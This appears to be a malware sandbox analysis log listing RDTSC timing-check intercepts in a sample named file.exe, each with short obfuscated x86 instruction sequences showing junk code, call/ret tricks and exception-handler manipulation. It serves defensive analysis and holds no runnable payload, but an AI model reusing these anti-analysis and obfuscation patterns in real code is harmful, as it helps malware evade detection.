Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2280F1 second address: 2280F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 263BE0 second address: 263BE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26420F second address: 264214 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2689FD second address: 268A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A03 second address: 268A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD7ECCCADEAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A11 second address: 268A1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A1E second address: 268A3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD7ECCCADF4h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A3C second address: 268A42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A42 second address: 268A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268A48 second address: 268A4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267DC1 second address: 267DDA instructions: 0x00000000 rdtsc 0x00000002 jno 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push edx 0x0000000c pop edx 0x0000000d jmp 00007FD7ECCCADEBh 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267DDA second address: 267DF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007FD7ED120766h 0x00000009 jmp 00007FD7ED12076Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267DF2 second address: 267E21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jnp 00007FD7ECCCADE6h 0x0000000c jmp 00007FD7ECCCADF9h 0x00000011 pop esi 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push esi 0x00000015 push eax 0x00000016 push edx 0x00000017 push edi 0x00000018 pop edi 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 267E21 second address: 267E27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2680F2 second address: 2680F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2680F8 second address: 2680FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2680FC second address: 268102 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268102 second address: 268108 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 268108 second address: 26810C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26810C second address: 268121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD7ED12076Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26AA4F second address: 26AA96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 7FE3793Bh 0x00000010 sub dword ptr [ebp+122D35E1h], edi 0x00000016 call 00007FD7ECCCADE9h 0x0000001b push eax 0x0000001c pushad 0x0000001d push edx 0x0000001e pop edx 0x0000001f jmp 00007FD7ECCCADEBh 0x00000024 popad 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 pushad 0x00000029 jp 00007FD7ECCCADE6h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26AA96 second address: 26AAB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD7ED120773h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26AFED second address: 26AFFE instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26AFFE second address: 26B002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26B7C6 second address: 26B7D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FD7ECCCADE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26B881 second address: 26B885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26B885 second address: 26B88B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26BA79 second address: 26BA82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26BA82 second address: 26BA86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C1E9 second address: 26C1EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C1EF second address: 26C1F9 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD7ECCCADECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C1F9 second address: 26C244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD7ED120768h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2194h], edx 0x00000029 push 00000000h 0x0000002b mov esi, dword ptr [ebp+122D1CC1h] 0x00000031 push 00000000h 0x00000033 mov dword ptr [ebp+122D1CABh], eax 0x00000039 xchg eax, ebx 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e push esi 0x0000003f pop esi 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26C244 second address: 26C24A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26E67C second address: 26E680 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26E37A second address: 26E37E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26F0DC second address: 26F0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 26FC68 second address: 26FC72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD7ECCCADE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 271374 second address: 27137A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27137A second address: 27137E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 229D0A second address: 229D0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 229D0F second address: 229D42 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD7ECCCAE09h 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FD7ECCCADE6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2710B1 second address: 2710B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2710B5 second address: 2710C9 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jl 00007FD7ECCCADEEh 0x00000011 push ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 278335 second address: 27833B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2792E5 second address: 2792F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 2792F7 second address: 2792FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 278499 second address: 2784B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD7ECCCADF4h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27953E second address: 279544 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A3D9 second address: 27A3E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 279544 second address: 27954E instructions: 0x00000000 rdtsc 0x00000002 js 00007FD7ED12076Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27B238 second address: 27B2B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c popad 0x0000000d jmp 00007FD7ECCCADF1h 0x00000012 popad 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FD7ECCCADE8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e and edi, dword ptr [ebp+122D2DDFh] 0x00000034 mov dword ptr [ebp+122D2A58h], ebx 0x0000003a push 00000000h 0x0000003c mov dword ptr [ebp+122D1E9Ah], ecx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push edi 0x00000047 call 00007FD7ECCCADE8h 0x0000004c pop edi 0x0000004d mov dword ptr [esp+04h], edi 0x00000051 add dword ptr [esp+04h], 00000018h 0x00000059 inc edi 0x0000005a push edi 0x0000005b ret 0x0000005c pop edi 0x0000005d ret 0x0000005e adc bh, FFFFFFBBh 0x00000061 xchg eax, esi 0x00000062 pushad 0x00000063 push ecx 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27B2B7 second address: 27B2DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007FD7ED120776h 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A4D1 second address: 27A4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27B2DD second address: 27B2E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27A4D5 second address: 27A4D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27C3F2 second address: 27C3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27C3F6 second address: 27C3FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E3C7 second address: 27E41B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FD7ED120776h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FD7ED120768h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a push 00000000h 0x0000002c mov ebx, ecx 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 push eax 0x00000032 push edx 0x00000033 push ebx 0x00000034 jne 00007FD7ED120766h 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27E41B second address: 27E422 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F545 second address: 27F55E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED12076Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F55E second address: 27F568 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FD7ECCCADE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27D5D5 second address: 27D679 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ED120770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD7ED120768h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007FD7ED120768h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 00000014h 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 mov dword ptr [ebp+122D2A96h], eax 0x0000004c mov dword ptr fs:[00000000h], esp 0x00000053 call 00007FD7ED12076Eh 0x00000058 mov ebx, esi 0x0000005a pop ebx 0x0000005b mov eax, dword ptr [ebp+122D0859h] 0x00000061 xor dword ptr [ebp+122D2091h], ecx 0x00000067 push FFFFFFFFh 0x00000069 mov dword ptr [ebp+1245E851h], eax 0x0000006f nop 0x00000070 jl 00007FD7ED120770h 0x00000076 push eax 0x00000077 pushad 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F568 second address: 27F5E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADF8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jnc 00007FD7ECCCADE7h 0x00000010 push 00000000h 0x00000012 mov bx, ax 0x00000015 mov dword ptr [ebp+1245DDA9h], edx 0x0000001b push 00000000h 0x0000001d jc 00007FD7ECCCADECh 0x00000023 add dword ptr [ebp+122D3298h], eax 0x00000029 pushad 0x0000002a call 00007FD7ECCCADF4h 0x0000002f mov si, di 0x00000032 pop esi 0x00000033 mov ebx, 66939C5Ah 0x00000038 popad 0x00000039 xchg eax, esi 0x0000003a jmp 00007FD7ECCCADEFh 0x0000003f push eax 0x00000040 pushad 0x00000041 jg 00007FD7ECCCADE8h 0x00000047 jbe 00007FD7ECCCADECh 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27D679 second address: 27D67D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27D67D second address: 27D681 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F6E4 second address: 27F6EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F6EE second address: 27F6F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F6F2 second address: 27F791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D377Ah], esi 0x0000000e push dword ptr fs:[00000000h] 0x00000015 pushad 0x00000016 mov esi, dword ptr [ebp+12454913h] 0x0000001c mov esi, dword ptr [ebp+122D2E0Bh] 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push 00000000h 0x0000002c push ecx 0x0000002d call 00007FD7ED120768h 0x00000032 pop ecx 0x00000033 mov dword ptr [esp+04h], ecx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc ecx 0x00000040 push ecx 0x00000041 ret 0x00000042 pop ecx 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D1F21h], ebx 0x0000004a mov eax, dword ptr [ebp+122D1471h] 0x00000050 push 00000000h 0x00000052 push esi 0x00000053 call 00007FD7ED120768h 0x00000058 pop esi 0x00000059 mov dword ptr [esp+04h], esi 0x0000005d add dword ptr [esp+04h], 0000001Bh 0x00000065 inc esi 0x00000066 push esi 0x00000067 ret 0x00000068 pop esi 0x00000069 ret 0x0000006a sub dword ptr [ebp+122D3840h], eax 0x00000070 mov edi, dword ptr [ebp+122D37D7h] 0x00000076 push FFFFFFFFh 0x00000078 push eax 0x00000079 pushad 0x0000007a jmp 00007FD7ED120776h 0x0000007f push eax 0x00000080 push edx 0x00000081 push eax 0x00000082 push edx 0x00000083 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281A9D second address: 281AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 27F791 second address: 27F795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281AA2 second address: 281B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push esi 0x00000009 jno 00007FD7ECCCADE8h 0x0000000f pop esi 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FD7ECCCADE8h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000015h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b push 00000000h 0x0000002d mov edi, dword ptr [ebp+122D1CB5h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push esi 0x00000038 call 00007FD7ECCCADE8h 0x0000003d pop esi 0x0000003e mov dword ptr [esp+04h], esi 0x00000042 add dword ptr [esp+04h], 0000001Ch 0x0000004a inc esi 0x0000004b push esi 0x0000004c ret 0x0000004d pop esi 0x0000004e ret 0x0000004f mov bl, dh 0x00000051 xchg eax, esi 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281B08 second address: 281B0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281B0E second address: 281B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281B13 second address: 281B1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281B1A second address: 281B27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 281B27 second address: 281B32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD7ED120766h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283AD8 second address: 283ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283ADF second address: 283AE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283C4B second address: 283C63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD7ECCCADEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283C63 second address: 283C7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jmp 00007FD7ED12076Fh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283C7A second address: 283CF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e mov dword ptr [ebp+122D2EDDh], edi 0x00000014 mov edi, dword ptr [ebp+122D2599h] 0x0000001a mov dword ptr fs:[00000000h], esp 0x00000021 mov dword ptr [ebp+122D39C0h], edi 0x00000027 mov eax, dword ptr [ebp+122D002Dh] 0x0000002d push 00000000h 0x0000002f push ebp 0x00000030 call 00007FD7ECCCADE8h 0x00000035 pop ebp 0x00000036 mov dword ptr [esp+04h], ebp 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ebp 0x00000043 push ebp 0x00000044 ret 0x00000045 pop ebp 0x00000046 ret 0x00000047 push FFFFFFFFh 0x00000049 js 00007FD7ECCCADECh 0x0000004f sub ebx, dword ptr [ebp+122D2D33h] 0x00000055 nop 0x00000056 push ecx 0x00000057 push ebx 0x00000058 je 00007FD7ECCCADE6h 0x0000005e pop ebx 0x0000005f pop ecx 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FD7ECCCADECh 0x00000069 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 283CF0 second address: 283CF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
